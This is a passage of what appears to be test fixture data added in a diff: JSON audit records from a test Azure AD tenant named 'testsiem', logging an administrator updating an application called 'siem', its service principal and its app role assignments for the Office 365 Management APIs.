"8f6eb24b-6e61-4ee2-a376-31368c300613"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "Name": "RequiredResourceAccess"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1638042Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438642"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "b2cc2456-5ac5-4399-b960-82a40036476f"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1638042Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438642"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "b2cc2456-5ac5-4399-b960-82a40036476f"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464434"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "d8a2ae24-a752-4f8e-adca-c57189a76a71"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": 